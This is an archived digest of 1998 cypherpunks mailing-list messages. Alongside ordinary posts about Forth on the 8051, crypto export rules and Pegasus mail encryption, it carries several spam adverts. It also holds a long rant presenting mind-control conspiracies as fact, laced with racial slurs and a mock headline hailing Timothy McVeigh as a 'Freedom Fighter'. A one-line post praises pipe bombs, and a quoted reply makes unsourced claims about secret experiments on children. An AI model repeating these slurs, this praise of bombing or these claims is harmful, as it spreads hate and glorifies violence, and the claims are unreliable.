Date: Thu, 23 Jul 1998 08:15:21 -0700 (PDT)
To: sjmz@hplb.hpl.hp.com
Subject: allahu akbar crowd
Message-ID: <35B7527E.B9@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Thursday 7/23/98 9:06 AM

John Young

Nice to talk to you last night.

I am concerned too about what may happen. http://caq.com/cryptogate

So was Hans Buehler.  He phoned me from Zurich to discuss
his concerns several years ago.

Getting things settled is up to congress.  

Rep McKinney and Sen Grassley are the contact points.  Both got
copies of the Swiss Radio International tapes.

Buehler, later, on the phone seemed resigned to what may happen.

Nothing he can do about it.

But there is something congress can do about it.

GET IT SETTLED!

bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lego@sbccom.com (Todd Bowers)
Date: Thu, 23 Jul 1998 07:59:57 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <19980723145638736.AAA266@oemcomputer>
MIME-Version: 1.0
Content-Type: text/plain


cool ..... i am 13




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Skoitch@aol.com
Date: Thu, 23 Jul 1998 09:22:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: W.A.Y.
Message-ID: <b9ebd885.35b762f7@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


WHY CANT I FIND ANY WHITE AMERICAN YOUTH ALBUMS ANYWHERE?   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Woolley, Carol" <carol.woolley@lmco.com>
Date: Thu, 23 Jul 1998 12:35:18 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: crypto on extranet questions
Message-ID: <ECA728804946F111A8BD0000F807E86CBDAF42@emss01m02.ems.lmco.com>
MIME-Version: 1.0
Content-Type: text/plain


We are designing an extranet for our non-employees, customers, and partners
to work on program information.  All users will be authenticated by personal
digital certificates that we will issue from our Netscape Certificate
Server.

It is my understanding that users from Canada, Italy, and Norway must have a
certificate encrypted at 56 bit.  Are you aware of any other
restrictions/requirements?

The crypto law survey mentions use of Trusted 3rd parties for Italy and
Norway.  Are there commercial companies that act as Trusted 3rd parties?

look forward to hearing from you.

carol
carol.woolley@lmco.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Thu, 23 Jul 1998 11:44:32 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 23, 1998
Message-ID: <199807231746.MAA01562@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here! 
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com
===========================================
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 23 Jul 1998 12:11:15 -0700 (PDT)
To: jy@jya.com
Subject: encryption devices, radiation-hardened devices , Forth and an INTELLIGENT UPS
Message-ID: <35B789A8.CD9@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Thursday 7/23/98 12:16 PM

John Young

I am looking at http://www.jya.com/cr072298.txt

REASON we did the 8051 Forth at Sandia is that I was ORDERED by
department manager Kent Parsons to port Forth from the 8085
to the 8051.

Sandia built a radiation-hardened 8085 chip set.

However, the 8085 took up lots of room and did not have timers, serial
expansion, bit-addressable registers/memory, on-board UART, etc.

Parsons helped convince Sandia upper management to build the 8051 as
a rad-hard part.

The guys doing the 8051 testing of the Sandia rad-hard part were writing
SIMPLE machine language programs to test the part.

Like hooking an LED to a port, flashing the LED, to see when it quit
while being irradiated.

We pointed out that running Forth itself exercises much of the 8051.

In addition writing test code for the instructions and hardware not
directly exercised by Forth was easy, in comparison to other software
technologies.  Either in high-level Forth or Forth assembler.

I managed a contract for Jerry Boutelle, author of the Nautilus II
metacompiler, to write test code for Sandia's 8051 rad-hard part.

Then, of course, I wrote a SANDIA-APPROVED book about our port of 8085
FIG Forth to the 8051.

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2    

And we shared the source code and documentation with anyone interested
in learning what we did.  

http://jya.com/f86/whpf86.htm 
http://jya.com/whpfiles.htm

While writing this note, I am watching an 8051 Forth run the test code

: XX 2 BASE ! 0
  BEGIN DUP U. 1+ ?TERMINAL 
  UNTIL ;

to see how many 8051 machines still work.

Let's switch subject to A NEW INNOVATION in Uninterruptable Power
Supplies.

Yesterday I bought a CyberPower Power 98/250VA for all for $59.95! at
Best Buy. http://www.cyberpowersystems.com/

Previously I looked at CompUSA at a APC 250 which had a rebate making
the final cost $79.99.  But NO MICROCONTROLLER and, thus, no brains.

CyberPower has a MICROCONTROLLER in it.
http://www.cyberpowersystems.com/products.cfm

Here is what you get.

1  lead/acid battery
2  SERIAL PORT in the UPS
3  Three UPS sockets - one for a transformer
4  Three surge-protected sockets - one for a transformer  450 joule
5  3.5 diskette containing Win 3.xx/9x software
6  One 9 pin rs232 cable
7  One 6 foot rj11 cable
8  Two rj11 surge-protected sockets.

Here is the idea.

The UPS monitors the line voltage.  

When the line voltage fails, then the UPS switches to battery.

The UPS then sends a message to your PC over the rs232.

The CyberPower software then closes all open files then turns
off your PC.

I am only running our PC and 15 inch screen from the battery backed up
supply.  Modem and printer go to the surge-protected sockets.

I pulled out the plug to the CyberPower Power 98/250VA and 
it switched over to battery.

I noticed some lines across the screen.  I attribute the lines to dc/ac
conversion and voltage step-up.

UNFORTUNATELY, I am using com1 for our mouse and com2
for our external modem.

Therefore, I am not able to try the software yet.

Alternative I have to fix this problem are get a

1   PS2 mouse and free-up com1
2   get another serial card for about $20.

Green return receipt request card received today indicated that
http://www.jya.com/whp071598.htm was received on Friday July 17, 1998

Let's all hope this HORRIBLE matter gets settled soon so we can all move
on to OTHER constructive projects.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: M Taylor <mctaylor@mta.ca>
Date: Thu, 23 Jul 1998 10:34:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Pegasus email, internal DES encryption?
Message-ID: <3.0.5.16.19980723142953.295f0d66@mailserv.mta.ca>
MIME-Version: 1.0
Content-Type: text/plain


I've been sent this requst indirectly, and thought it best to forward it to
these lists, anonymously. I will forward any replies to the original sender.

-M Taylor

-------------------
Hi guys.

Sorry that this is a little off topic, but I figure that here is my best
chance to find this information, all other resources (save damned
reverse engineering) having been exhausted.

If you have used Pegasus mail before, you would know that it provides an
internal encryption function.  This is some form of DES, accourding to
their web site, and is presumably < 40 bits, as they quite happily allow
worldwide downloads of the binard from the US.  However, actual details
on which form of DES, and how they turn an input password into a key
were not supplied.

Now, my company decided that this encryption was just dandy for
security, and that everyone should use it for all encrypted mail.  This,
along with their idiocies about passwords used have me quite annoyed -
but that is *far* from the point of this.

What I am wanting to do, so as not to have to give up my nice, efficient
unix mailer, while retaining the abilitiy to work with others is
implement (or locate an implementation of) the Pegasus encryption, and
then do a little hacking and add that to my mailer.

The main problem is: no idea what the format of the DES used is.

So, if anyone could supply me with a simple answer to this question, I
would be very apreciative.

Thanks,
 xxxx





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listmaster@extensis.com
Date: Thu, 23 Jul 1998 14:57:18 -0700 (PDT)
To: undisclosed-recipients:;
Subject: Get the most of Quark 4.0 - with Extensis QX-Tools
Message-ID: <bulk.29191.19980723110207@ssl.extensis.com>
MIME-Version: 1.0
Content-Type: text/plain


Announcing Extensis QX-Tools 4.0 for QuarkXPress 4.0 


Now, get the most out of QuarkXPress 4.0 - with Extensis QX-Tools 4.0  
http://www.extensis.com/qxtoolsp

 Now available for Mac and Windows.
 NEW! Convert EPS, PostScript, and PDF files into editable Quark Objects.
 NEW! Create and apply styles to objects.
 Improved!  Re-scale groups of objects- without losing the option to undo.
 Plus, 5 other must-have tools that get the most out of QuarkXPress 4.0


On July 10, 1998 QX-Tools 4.0 Won "Best of Show" at MacWorld.

Here's what they've been talking about....

Extensis QX-Tools gets the most out of QuarkXPress 4.0 by putting 
your creative ideas to work - faster. QX-Tools 4.0 incorporates 8 
different tools that use the familiar interfaces you already know. 
Spend your time designing, not learning new software.

With NEW QX-VectorEdit, convert any PostScript file into an editable 
Quark object. Word tables, Excel charts, Illustrator, FreeHand, and 
PDF files now become Quark objects.  Edit them, correct them, trap 
them or fix their colors - right in QuarkXPress. Once edited, assign 
the object to a layer with QX-Layers. Yes, layers ARE possible in 
QuarkXPress.  Create, show, hide, reorder and assign any object to 
any layer in your document.

Improved QX-Scaler lets you size and resize groups of objects - with 
precision- without ever losing the option to undo. Once applied, you 
can change any of the object attributes with NEW QX-ItemStyles.  
Create and apply item styles to OBJECTS- using over 50 different 
attributes.  Now, quickly navigate through your documents with 
QX-Viewer, a full-color, multi-spread preview. Then, apply the same 
QX-ItemStyle to objects throughout your document for speed and 
consistency.

With three other useful tools-QX-FineTune (tweak characters and 
objects), QX-Palettes (they're dockable!) and QX-Find-Change (search 
and replace for objects by attribute)-QX-Tools will put your creative 
ideas to work in QuarkXPress- in no time.

Now, make QuarkXPress 4.0 work the way you REALLY want - with 
Extensis QX-Tools 4.0.

SPECIAL OFFER:
Order QX-Tools 4.0  NOW for only $149.95 

To ORDER, download a free demo, or for more information, please visit: 
http://www.extensis.com/qxtoolsp

Or call Extensis at (800) 796-9798 or (503) 274-2020.

Extensis QX-Tools 4.0 is available for both Mac and Windows.
Extensis QX-Tools 4.0 is compatible with QuarkXpress (r) 4.03.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PS. We have made every effort to ensure this message is being sent 
only to people who have expressed interest in Extensis products.  
If we have sent this to you in error, please accept our apologies 
and reply with REMOVE in the subject line for automatic exclusion 
from future communications.  If you know someone who would like to 
be on our mailing list have them send an email to 
listmaster@extensis.com with ADD in the subject line and their 
email address in the body.

P.P.S. This message is intended for North American customers.  
If you are located outside of North America and have received this 
message, please visit  www.extensis.com/purchase/ to find the nearest 
local distributor in your country.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ant6menace@aol.com
Date: Thu, 23 Jul 1998 12:52:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Pipe bombs r better
Message-ID: <3d259bf6.35b79455@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


they rule!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <ODL@odlink.com>
Date: Thu, 23 Jul 1998 17:24:55 -0700 (PDT)
Subject: Grand Opening Computer Sale
Message-ID: <989.283923.689449 ODL@odlink.com>
MIME-Version: 1.0
Content-Type: text/plain


We apologize if this electronic mail was an inconvenience, if you 
would like to be removed from future mailings please send your 
email address to remove@odlink.com 

If you would like to be emailed monthly on special closeout items 
send your email address to yes@odlink.com 

If you're a geek like me and want weekly updates send your email 
address to geek@odlink.com 

For more information email  request to sales@odlink.com

Check out our web site at www.odlink.com it's under construction 
but you will see where we are headed!

SUPER SALE!!!


AMD K6 233 MHZ COMPUTER

CASE,  KEYBOARD,  MOUSE,  1.44 FLOPPY DRIVE,
S3 2MB VIDEO CARD,  MOTHERBOARD, 233 MHZ CPU,
32xCDROM, 100watt speakers,32mb SDRAM,3.2 GIG HD
Yamaha 3D soundcard
LOTUS SMARTSUITE SOFTWARE ($149 value)
MICROSOFT WORD 97
MICROSOFT WORKS 4.5
MICROSOFT PUBLISHER 98
MICROSOFT BOOKSHELF 98   ($199.00 value)

All for the unbelievably LOW PRICE of $499.00


AMD K6 266 MHZ COMPUTER

CASE,  KEYBOARD,  MOUSE,  1.44 FLOPPY DRIVE,
S3 2MB VIDEO CARD,  MOTHERBOARD, 266 MHZ CPU,
32xCDROM, 100watt speakers,32mb SDRAM,3.2 GIG HD
Yamaha 3D soundcard
LOTUS SMARTSUITE SOFTWARE ($149 value)
MICROSOFT WORD 97
MICROSOFT WORKS 4.5
MICROSOFT PUBLISHER 98
MICROSOFT BOOKSHELF 98   ($199.00 value)

All for the unbelievably LOW PRICE of $539.00


AMD K6 300 MHZ COMPUTER

CASE,  KEYBOARD,  MOUSE,  1.44 FLOPPY DRIVE,
S3 2MB VIDEO CARD,  MOTHERBOARD, 300 MHZ CPU,
32xCDROM, 100watt speakers,32mb SDRAM,3.2 GIG HD
Yamaha 3D soundcard
LOTUS SMARTSUITE SOFTWARE ($149 value)
MICROSOFT WORD 97
MICROSOFT WORKS 4.5
MICROSOFT PUBLISHER 98
MICROSOFT BOOKSHELF 98    ($199.00 value)

All for the unbelievably LOW PRICE of $589.00

OFFICE DIRECT LINK, llc
531 W. Arapaho, Suite 101
Richardson, TX. 75080

phone (972) 680-1700
fax   (972) 680-1698

 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: InstallShield International Sales <intl-sales@installshield.com>
Date: Thu, 23 Jul 1998 15:54:36 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: InstallShield Important Download Information
Message-ID: <B0000024108@www.installshield.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

Thank you for visiting the InstallShield Website.

We would like to let you know that you can contact us for 
information you may require about our company, our
products or our websites.

We also have an international network of resellers and distributors 
that maintain stock and can provide the software
to you quickly.  They offer the convenience of 
acquiring the product in local currency and support in 
your local language.  

In Czech Republic you can obtain products from the following company:

Unicorn Distribution
Rohacova 83
Praha, 3   130 00
Czech Republic

Phone: +420 (2) 697 2202
Fax: +420 (2) 697 11 95
Email: jaros@unicorn.cz


If you find that you are not happy with our resellers, please
hit REPLY and let us know immediately.

We are here to assist you in any way that we can to get the 
most from our products, our company, our partners and our website. 
Any comments, questions or concerns you may have are more 
than welcome. Just let us know if there is anything we can do for you.

Once again, thank you for visiting the InstallShield Website.

The password for the InstallShield5.1 evaluation is "AlbertCamus"

Regards,

International Sales Department
intl-sales@installshield.com
+1-(847) 517-8191 voice
+1-(847) 240-9138 fax







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Thu, 23 Jul 1998 18:52:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: THEY - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C99F3.93CF4780.32@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Where Do THE (TM) Want our Mind To Go Today? - SAHMD!!!
_________________________________________________________

"ou're not really an anarchist if you don't have your Anarchist Union
 dues paid up-to-date."
~Anna R. Christ, U.S. Government Department of Anarchy Czar


  Even those who dismiss, as ridiculous, the conspiracist theory that the
entire world is controlled by a small, Secret Cabal of individuals, with
me at its head, recognize that over the course of history, the media
began encroaching on the traditional role of religion and community as
the source of beliefs about the world around them, as well as increasingly
influencing opinions and attitudes, and that the news media was originally
controlled by a very small enclave of individuals with powerful financial
and political connections.
  Thus, the front-page newspaper story about the completion of this or
that railway was more likely to be accompanied by a picture of a Railway
Czar chomping on a fat cigar as he drove the last spike, rather than a
picture of 30,000 Dead Chincs, since the LittleellerFellers didn't get
a lot of dinner invitations to the publisher's estate.

  Far from being a Secret Conspiracy, the control of the newpaper media
by a few individuals was a well-established Open Conspiracy, regarded
as SimplyTheWayThingsAre in an era when the money, power and connections 
of the OldBoyNetwork trumped poverty, insignificance and a cousin named
Louie who could get you a good deal on a pair of used shoes.
  Regardless of the fact that the public knew that the news was a fixed
game, even if there was a 'competing' newsrag from a different member
of the RichAndPowerfulOldBoysNetwork, it was the only game in town, and
those in control of the news that got reported were the ones who named
the game and framed whatever debate took place.
  The newspaper publishers of yesteryear were, like todays car salesmen,
masters of manipulating their customers into choosing between the 'models'
of news/opinion/reality that *they* were offering. Even today, for all
of the lip-service paid to 'competition' in the mainstream media, I doubt
that there was a single person in America who bought copies of *all* the
major mainstream newspapers in order to find the one with the headline,
"Freedom Fighter Timothy McVeigh Takes A Bite Out Of Government Crime."

  In 1937, by which time  America had more radios than indoor toilets, 
the Rockerfeller Foundation started funding early mind-control research
into the social effects of new forms of mass media, such as radio, and
their potential for effecting social control of the masses.
  The main headquarters for the research, which was carried out by 
several universities, was at the Office of Radio Research, at Princeton.
It was headed by Paul Lazersfeld, an influential figure in a Marxist
ThinkTank, the Institute for Social Research (I.S.R.), commonly known
as the Frankfurt School.

  Interestingly, the goals of the Bolshevik Intelligentsi of I.S.R.--to
undermine the Judeo-Christian legacy of Western Civilization through an
"abolution of culture," and to determine new cultural forms which would
increase the alienization of the population--were very similar in concept
to the techniques that Canadian mind-butcherer, Dr. Ewen Cameron, would
pioneer decades later in the field of psychiatry--creating 'Differential
Amnesia' through electroshock mind-wiping, and recreating persona/
personality through the use of 'Psychic Driving'--with the main difference
seeming to be that the Radio Project's Lazersfeld didn't have access to
the technology to pump thousands of volts through the brains of the 
masses, so had to settle for giving them extended treatments with low-
power radio waves, as well as using repetitive formatting instead of
Dr. Cameron's "I am a good person who is going to assassinate the Prime
Minister" tape-loops.
  At the time, Communism was Semi-Fashionable, not yet having been 
magically transformed, overnight, into the GreatEvil, and among the
entities taking an interest in using the Comintern created thinktank
to learn how to use Bolshevik techniques to put the masses in their
back pocket were, besides the Rockerfeller Foundation, the Columbian
Broadcasting System, several American intelligence services, and the 
International Labour Organization.
  As Michael J. Minnicino notes, in 'The New Dark Age,' "Despite the 
official gloss, the activities of the Radio Project make it clear that
its purpose was to test empirically the (I.S.P.) Adorno-Benjamin thesis
that the net effect of the mass media could be to atomize and increase
lability--what people would later call "brainwashing."

[EditWhore's Note: If you are incapable of making the connection between
TV/Advertising and Hypnosis, because the programs and ads don't begin 
with, "ou are growing veerrryyy sleepy," or between TV/Advertising and
Brainwashing, because a BigRat doesn't jump out of the TV and eat your
face, then just try to equate TV/Advertising with your mother's attempts
to convince you that broccoli tastes good, or the teacher who tried to
trick you into thinking that Math was more fun than looking out the
window and watching the dogs fucking in the schoolyard.]

  Frank Stanton, an industrial psychology Ph.D., later to become the
President of the CBS News Division, President of CBS, and Chairman of
the Board of the RAND Corporation, was the Radio Project's research
director.
  Herta Herzog would later use the propaganda skills she developed as
a Radio Project researcher to become the first director of research
for Voice of America.
  The course of the whole developing radio industry would shortly be
affected in a major way by the Rockerfeller/Intelligence/Broadcaster's
Radio Project research into the use of the radio medium as a tool for
Social/Mind Control.

  In a 1939 Journal of Applied Psychology quarterly edition, the Radio
Project published their conclusion that Americans had become "radio
minded" (think about that phrase...), and that "their listening had
become so fragmented that repetition of format was the key to popularity,"
as Minnicino points out. "The play list determined the 'hits'...and 
repetition could make any form of music or any performer...a 'star.'"
("ou got your dead skunk in the middle of the road, dead skunk in the
 middle of the road...")


ou Want Regular Vanilla, Or Vanilla Regular?
[WAS - Beyond The Valley Of The Mountain Of The Planet Of The Apes /
 Parts 1 Through 2,987,746,376,802,413]:

"Not only are hit songs, stars, and soap operas cyclically recurrent and 
rigidly invariable types, but the specific content of the entertainment
itself is derived from them and only appears to change. The details are
interchangeable."
~Theodor Adorno, Chief of the Radio Project's Music Section, and an
 instrumental, decades-long member of the Communist Institute For Social
 Research, to which we owe a debt of gratitude for ensuring that audio
 pictures of Chairman Rockerfeller would dominate our audio landscape,
 and that quotations from the BigBankBook of Chairman Rockerfeller would
 fall on our ears, day and night.

[EditWhore's Note: Today, of course, Corporations are getting in on
 the act by turning arts and sports events into an advertising medium
 in their own right (e.g. The Nike Bolshoi Ballet Company, and the
 Ravage Realty Desert Golf Classic), not to mention Chairman Pepsi
 purchasing the rights to the high-school Proletariat from their 
 bourgeois SchoolMasters.]


Shut The Fuck Up And Give Me our Gut-Feeling About This Program:

  Next time that you're having a highly-intellectual discussion (drinking
cafe-latte with your little pinkie raised), about the philosophical and
conceptual themes of a given program, think about "Little Annie" aka
the Stanton-Lazersfeld Pogrom ( <--meaninful typo ) Analyzer.
  It was designed to allow test-audience members to register the intensity
of their likes-dislikes on a moment-to-moment basis during a program. This
allowed the operators to determine which situations or characters produced
a momentary, positive feeling state.
  Michael Minnicino notes that "Little Annie transformed radio, film,
and ultimately television programming." He adds that Little Annie, in
updated formats, is still what drives mainstream programming today.

[Note From T. Arthur: Basically, Little Annie is the human equivalent
 of the Pavlovian drool-cup, measuring the flow of body juices when
 the DoggieFoodLight goes on, or you watch an ad for edible panties. 
 The VoicesInsideMyHead that claim, "Everything since the BigBang has 
 been plagarism," when translated from Analog Wave to Digital Format, 
 say, "The only movie/program that really exists is 'The ogi Berra 
 Story'...everything else is DejaVuReRunsAllOverAgain.]



Our Story So Far:
  OK, so we got your small Non-Secret Cabal of NewsRag Czars going about
their business of exercising their InGodWeTrust-Given Right to decide 
what people with less money should know and think. 
  And then we got your Radio Media Medium starting to cut-in on the 
NewsRag Czar's RealityCreationRacket, as a result of there being more 
of them than indoor toilets, so as how people now get their RealityInput
even when they ain't on the Crapper, making room for what they is reading
by engaging in ExcessRealityOutput (A RetroTech version of GarbageIn-
GarbageOut), and then wiping their OutputDevice with their InputDevice.
  And then we got your basic RichGuyFoundation using TaxDeductibleDollars
to hire your basic GodLessCommies to figure out how the RichGuys can use 
the rEvolutionary New Commi-Tel Bolshevik Marketing System to get the
Radio Proletariat to pony-up $ 19.95 (plus shipping and handling) for
the SilverPlatter upon which their "new cultural forms" (Translation:
ConsumerIsm) will be handed to them, making the RichGuy even richer (by 
using TaxDeductibleDollars, nonetheless--pretty tricky, eh?).
  And we got your WhiteReds telling us that if they play a CountryBlues 
song as many times as there is pictures of Stalin in Moscow, then, not
only can they make some Drifter a star, but they can measure how many
times JoeSixPack's blood rushes to his brain or his penis while he's
thinking about how *his* baby done left him, too, and that if more blood
is rushing back and forth when Luke the Drifter is singing the words 
'baby' and 'yeah,' then they can take a song called, "Baby, Baby, eah-
eah, eah, eah, Baby eah-eah," and get Joe SixPack's blood flowing
in and out of his penis so fast that he'll need a Pavlovian Drool-Cup
underneath his Pecker, and that they can have the song performed by some
oungStud who they put on TV and have him wiggle his pelvis around like
some BigDickedDarkie, and get the blood flowing back and forth in the
women's private parts too, which would *really* result in "new cultural
forms which would increase the alienation of the populace," because Daddy
don't want his LittlePrincess (TM) getting her LittleNastyParts (TM) all 
juiced up by some WhiteNiggerLoverBoy.


  Oh...except I guess I haven't mentioned the part about TeleVision, yet.

  Anyway, you got to remember that the reason that your RunOfTheMillBasic
GodLessCommie is Godless, is that if you're going to start a rEvolution,
then you can't have your Proletariat all junked-out on Religion, or they
are going to be too laid-back to help you torch the Palace. So you have
to create your basic NewBarbarism, getting rid of anything that smacks
of Universal Truth or Natural Law, and get people to trade in their old
PopeMobile for a SnowmobileRacingAcrossTheTundra, with a BigTittedNun
stroking Nietzsche's IceWeasle in glossy-color ads telling the Prolotariat
that there's no need to stick to the straight-and-narrow path when you've 
got an off-road philosophical vehicle that can go BeyondGoodAndEvil in 
sex-seconds flat.
  This appeals to a lot of people who never had seconds on sex because
they could only fuck once in the backseat of their PopeMobile, since it
was supposed to be for making babies, and not for having fun, but they
can play HideTheSalami as many times as they want on the seat of a
snowmobile, with God-and-everybody watching (only there is not really
any God).

  What is important to realize is that one of the main Keys to making the
BullShitVic's Schtick work, has to do with shit-canning the creative act
and making creativity historically-specific.

[Author's Note: Although this is important, I don't really know exactly
 how to explain why it is so, since I don't really understand it and I
 am, in large part, merely plagarizing excerpts from 'The New Dark Age'
 by Michael J. Minnicino, on this point.
 I think Tim C. May and some of the other CypherPunks understand this
 crap, though, so maybe you could ask them about it...]

  But I *do* understand *why* it is important to Marxist rEvolutionaries
to burn up and toss out all of the old writings and art, and stuff, in
order to take control of the hearts and minds of the Proletariat, since
it is like moving in with a NewOldLady, and she's got pictures of her
old boyfriend around, and loveletters and stuff, and you don't want her
thinking about him while you're sticking your dick in her.

  So, anyway...
  It's not like Rockerfeller ain't 'getting any,' since he's already a
part of the OldBoyNetwork that's GangBangingReality with their OfficalNews
/WorldView Schlongs, but Radio is the NewKidInTown and you don't want him 
stealing your chicks, so you're going to join up with his gang, too, and 
you figure it won't hurt to try and pick up a few new pointers on putting 
your MeatInMotion from Stalin's BumBuddies, since Stalin is, like, the 
JohnnyWadd of Social Control.
  So Stalin's BumBuddies tell you that first, you got to get Prolotariat
Chicks a little tipsy and disoriented by culturing them with a little bit
of Absolut, you set some new cultural forms (make their nipples hard) by
sweet-talking them a bit, and then create a NewBarbarism by talking nasty
to them. 
  Of course, once you have the attention of their orfice, then you keep 
driving home your point, repeatedly, and if you can find the spots on
their body that make them feel good or bad, and give them the proper
combination of each, then you can whisper 'give me all your money' in
their ear while they are in the throes of passion, and they will hardly
notice, but they will *do* it.

{Excuse me, but I've got to go have a smoke...be right back...}

  In reality, as the GodLessCommies from the Institute for Social Research
undoubtedly explained to Rocky, after he had a shower, was that the same
basic rules applied, whether you were using your real name or using an
alias, such as Reverend Sun Moon, Jim Baker, Jim Jones, Dr. Cameron, 
or Richard Helms.
  As a matter of fact, one of the main reasons for the intensity of the
Rockerfeller Foundation's interest in the use of Radio for Social/Mind
Control was that one of Rocky's financial and political associates,
Adolf Hitler, had begun 'stealing the show,' so to speak, with the
vivacity of his powerful presence in the medium.
  Another factor in the Rockerfeller Foundations quest to learn the
secret of using Radio as a tool of social and mind control was the
emergence of Radio's younger cousin, Television, which showed promise
of being able to surpass Radio's ClitLicking talents, and go straight
for the G-spot.

  Theodor Adorno wrote, in regard to TeleVision, in 1944, 
"Its consequences will be quite  enormous and promise to intensify the 
impoverishment of aesthetic matter so drastically that by tomorrow the 
thinly veiled identity of all industrial culture products can come 
triumphantly out in the open, derisively fulfilling the Wagnerian dream 
of the Gesamtkunstwerk--the fusion of all the arts into one work."
(The New World ArtEr)
  In other words, TeleVision was seen by the I.S.P, the Rockerfellers,
Military Intelligence Agencies, et al, FROM ITS VER INCEPTION, as a
useful tool in using intellectually lame, but emotionally significant
content, as an instrument of social control which could be used to
significantly influence the minds/thought/beliefs/opinions of the 
public. (In other words, TV wasn't born 'retarded' by 'accident.')


  So, whether or not one believes in a single individual, or group of
individuals, who is secretly running the world and controlling the whole
of our reality, it seems that there are certainly a number of people who
are *trying* to do so.

  The techniques of mind-control are nothing new--they are centuries old
and are only being 'refined' in our time, through research and experiment-
ation, to be applical over a wider range of geography than simply the 
local village, and over a greater spectrum of ethnicity than the members
of closely related tribes.
  The future of TeleVision was set a half-century ago by people of wealth
and power who had gone to great pains to research the best way to develop
the electronic media as a tool of social control via mind control. Even
the most cursory of checks indicates that members of Military Intelligence
agencies were as 'thick as thieves' in the creation and management of
the Television Industry.

  These people have had over a half-century to develop and refine their
control of and use of electronic media to meet their own ends.
  Wouldn't it be terrifying if they had not only developed the means to
put their witting and unwitting shills *anywhere* they wanted in our
societies, corporations, governments and educational institutions, but
also had a means to use their shills in every area of our life, in order
to influence what we see, think and the way in which we perceive our
world...?

[WATCH THIS SPACE]ALIEN




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Thu, 23 Jul 1998 04:01:26 -0700 (PDT)
To: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Subject: Iz thiz real?
In-Reply-To: <009C9964.46C72D20.1@west.cscwc.pima.edu>
Message-ID: <3.0.5.32.19980723200049.00867400@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


This reads as real, not the mindless rehashing of almost'was that typically
characterizes the posts from "Linda Reed".

Linda, are you sure you didn't eat the drugs, and imagine you were a space
alien?

Reeza!

Text follows:


>  A friend of mine did computer work for an Arizona neurologist who put
>electrodes and steel plates in the skulls of monkeys, rabbits, etc., in
>order to do brain-mapping (one of the major areas of mind-control 
>research), in order to study Parkinson's Disease.
>  The neurologist was approached by a research foundation that was very
>interested in giving him a grant to work with children, instead of with
>animals. This has become an acceptable area of experimentation (a quick
>study of those involved easily links them to a variety of intelligence
>agencies). Their offer was refused as a result of the format and structure
>of the proposal obviously being geared more toward providing information
>and results that had more to do with learning methods to control aberrant
>behavior than with benefitting the proposed child subjects.
>  After his refusal, his current grant was canceled, and he was again
>made the offer, which he accepted.
>
>  Dr. Ewen Cameron, the Canadian MKULTRA mind-butcherer, was instrumental
>in helping the CIA to see the benefit of taking an 'interdisciplinary'
>approach to mind-control.
>  Although Dr. Cameron's basic method was to combine a wide variety of 
>medical, biological, psychiatric, anthropological, et al, methods using
>his own limited knowledge, in your basic VoodooLeeches methodology, the
>CIA and military intelligence agencies began consolidating the various
>arenas of mind/human-conditioning research and experimentation by helping
>to sychronize the research of a wide body of educational and research
>professionals in divergent fields of expertise.
>  As a result of directing the focus and evolution of the majority of
>scientific and psychological research in North America through control
>of the funding mechanisms and access to research publishing, the American
>intelligence community has managed to merge the research community into
>an integrated tool for delivering the information and results desired
>by the Controllers for their own grand designs.
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: diy39@interbiz1@mailexcite.com
Date: Thu, 23 Jul 1998 20:25:44 -0700 (PDT)
To: diy39@interbiz1@mailexcite.com
Subject: Creating Wealth In America
Message-ID: <19980723359FAA6701@interbiz.chi.swissbank.com>
MIME-Version: 1.0
Content-Type: text/plain


Creating Wealth in America

>From the desk of Robert Allen, The Author of 2 Mega Best-Sellers,
Nothing Down and Creating  Wealth in America

San Diego, California 
11:29 P.M.

"I can't sleep until I get this off my chest."

"I'm extremely frustrated".

Odds are that nine out of ten people who receive this letter will discard 
it without a second thought.  Yet, I know that I have discovered a secret 
that could change your financial life forever!  And I'm willing to share 
it with you for FREE.

